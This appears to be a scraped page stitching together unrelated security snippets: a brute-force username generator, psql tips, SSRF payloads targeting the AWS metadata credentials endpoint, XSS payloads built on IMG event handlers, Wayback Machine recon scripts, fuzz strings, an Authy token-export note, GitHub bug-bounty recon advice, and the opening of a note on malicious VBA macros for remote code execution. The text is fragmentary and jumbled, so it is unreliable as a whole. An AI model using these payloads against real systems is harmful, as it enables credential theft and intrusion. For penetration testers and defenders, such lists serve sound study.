| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
Magic words:
psql -U postgresSome interesting flags (to see all, use -h or --help depending on your psql version):
-E: will describe the underlaying queries of the \ commands (cool for learning!)-l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
Past August 2024, Authy stopped supported the desktop version of their apps:
See Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August for details.
And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export to tokens.
If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List: